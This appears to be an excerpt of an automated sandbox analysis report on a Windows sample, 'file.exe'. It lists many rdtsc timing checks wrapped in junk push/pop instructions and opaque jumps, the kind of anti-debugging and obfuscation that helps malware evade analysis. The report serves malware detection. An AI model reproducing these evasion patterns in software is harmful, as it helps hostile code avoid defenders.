              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A67AF second address: 6A67D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC714E98431h 0x00000009 jp 00007FC714E98426h 0x0000000f popad 0x00000010 pop edi 0x00000011 pushad 0x00000012 jng 00007FC714E9842Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A67D5 second address: 6A67DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6902 second address: 6A6908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6908 second address: 6A690F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A690F second address: 6A697A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC714E98428h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FC714E98436h 0x00000010 jmp 00007FC714E9842Bh 0x00000015 jmp 00007FC714E98439h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC714E98437h 0x00000024 push edi 0x00000025 pushad 0x00000026 popad 0x00000027 jnp 00007FC714E98426h 0x0000002d pop edi 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8863 second address: 6A887F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC714E8FEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 js 00007FC714E8FEF8h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A887F second address: 6A8883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8883 second address: 6A8887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8923 second address: 6A8929 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8C53 second address: 6A8C59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8F7B second address: 6A8F7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A97D0 second address: 6A97DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC714E8FEE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A97DF second address: 6A97F0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC714E98426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AAEBD second address: 6AAEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AAEC3 second address: 6AAEC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AAEC7 second address: 6AAED7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FC714E8FEEAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AAED7 second address: 6AAEE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC714E9842Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AAEE5 second address: 6AAF0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF0h 0x00000007 je 00007FC714E8FEE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 jmp 00007FC714E8FEEBh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB5B5 second address: 6AB5B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB5B9 second address: 6AB5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FC714E8FEF7h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB5DE second address: 6AB5E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC714E98426h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ACFDA second address: 6ACFF0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jp 00007FC714E8FF05h 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007FC714E8FEE6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AF193 second address: 6AF197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AF197 second address: 6AF1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FC714E8FEEFh 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 jnl 00007FC714E8FEE6h 0x00000018 pop esi 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AF1BA second address: 6AF25A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E9842Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FC714E98428h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov si, di 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebp 0x0000002c call 00007FC714E98428h 0x00000031 pop ebp 0x00000032 mov dword ptr [esp+04h], ebp 0x00000036 add dword ptr [esp+04h], 0000001Dh 0x0000003e inc ebp 0x0000003f push ebp 0x00000040 ret 0x00000041 pop ebp 0x00000042 ret 0x00000043 adc di, 955Dh 0x00000048 mov dword ptr [ebp+12472CB3h], ebx 0x0000004e push 00000000h 0x00000050 push 00000000h 0x00000052 push ecx 0x00000053 call 00007FC714E98428h 0x00000058 pop ecx 0x00000059 mov dword ptr [esp+04h], ecx 0x0000005d add dword ptr [esp+04h], 00000015h 0x00000065 inc ecx 0x00000066 push ecx 0x00000067 ret 0x00000068 pop ecx 0x00000069 ret 0x0000006a mov di, dx 0x0000006d mov dword ptr [ebp+122D2832h], edx 0x00000073 xchg eax, ebx 0x00000074 push eax 0x00000075 push edx 0x00000076 jno 00007FC714E9842Ch 0x0000007c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFCEC second address: 6AFD45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 jmp 00007FC714E8FEF7h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FC714E8FEE8h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a sub dword ptr [ebp+1246320Ch], ecx 0x00000030 mov di, 01A2h 0x00000034 push eax 0x00000035 pushad 0x00000036 jng 00007FC714E8FEECh 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFABB second address: 6AFAD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E98435h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFAD7 second address: 6AFADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFADD second address: 6AFAEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFAEA second address: 6AFAF0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B238C second address: 6B239F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push edx 0x0000000b jl 00007FC714E98426h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65D190 second address: 65D196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B34B4 second address: 6B34C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B6490 second address: 6B6496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B6496 second address: 6B649A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B649A second address: 6B6523 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 cld 0x0000000a adc ebx, 731D5015h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FC714E8FEE8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c sbb bl, 00000013h 0x0000002f mov dword ptr [ebp+122D23C7h], ecx 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007FC714E8FEE8h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 00000016h 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 xchg eax, esi 0x00000052 jno 00007FC714E8FF04h 0x00000058 push eax 0x00000059 push esi 0x0000005a push eax 0x0000005b push edx 0x0000005c jnl 00007FC714E8FEE6h 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B757B second address: 6B75AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E98437h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jmp 00007FC714E98434h 0x00000012 pop edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B9625 second address: 6B963B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC714E8FEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c je 00007FC714E8FEF4h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BD78E second address: 6BD798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC714E98426h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BD798 second address: 6BD79C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B6741 second address: 6B6751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FC714E98428h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B6751 second address: 6B6757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C16CC second address: 6C16D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B9821 second address: 6B9828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C37E8 second address: 6C37F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B9828 second address: 6B9839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B9839 second address: 6B983E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C37F2 second address: 6C3803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FC714E8FEE8h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3803 second address: 6C3809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B98E9 second address: 6B98ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B98ED second address: 6B98F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C492A second address: 6C492E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA85E second address: 6BA868 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC714E9842Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA868 second address: 6BA875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA875 second address: 6BA887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC714E9842Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C599E second address: 6C59AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FC714E8FEE6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BC734 second address: 6BC73B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C18EC second address: 6C18F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C18F2 second address: 6C1901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1901 second address: 6C1905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1905 second address: 6C190F instructions: 0x00000000 rdtsc 0x00000002 js 00007FC714E98426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C39CA second address: 6C39CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C19C0 second address: 6C19C6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C19C6 second address: 6C19CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C19CC second address: 6C19D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE97D second address: 6BE9F9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC714E8FEECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b clc 0x0000000c push dword ptr fs:[00000000h] 0x00000013 stc 0x00000014 mov dword ptr fs:[00000000h], esp 0x0000001b jmp 00007FC714E8FEF3h 0x00000020 mov eax, dword ptr [ebp+122D1211h] 0x00000026 mov di, cx 0x00000029 push FFFFFFFFh 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007FC714E8FEE8h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 jc 00007FC714E8FEEEh 0x0000004b push edx 0x0000004c je 00007FC714E8FEE6h 0x00000052 pop ebx 0x00000053 nop 0x00000054 pushad 0x00000055 push eax 0x00000056 push ecx 0x00000057 pop ecx 0x00000058 pop eax 0x00000059 js 00007FC714E8FEECh 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0778 second address: 6D0784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 ja 00007FC714E98426h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0784 second address: 6D0788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0788 second address: 6D07B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FC714E98438h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0A76 second address: 6D0A7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0A7E second address: 6D0A9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E9842Ch 0x00000007 push ebx 0x00000008 jmp 00007FC714E9842Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC035 second address: 6DC053 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnl 00007FC714E8FEE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FC714E8FEE6h 0x00000014 jmp 00007FC714E8FEEAh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DACBB second address: 6DACC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB26B second address: 6DB296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC714E8FEEAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC714E8FEF4h 0x00000011 jbe 00007FC714E8FEE6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB5AE second address: 6DB5B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB5B2 second address: 6DB5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC714E8FEF5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBA54 second address: 6DBA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC714E98430h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBA68 second address: 6DBA6E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBA6E second address: 6DBA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBA74 second address: 6DBA80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FC714E8FEE6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBA80 second address: 6DBA84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBA84 second address: 6DBAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FC714E8FEE8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 jg 00007FC714E8FEE6h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBAA0 second address: 6DBAAA instructions: 0x00000000 rdtsc 0x00000002 js 00007FC714E98426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBAAA second address: 6DBAB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FC714E8FEE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBAB5 second address: 6DBABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBDAF second address: 6DBDB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E199E second address: 6E19A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
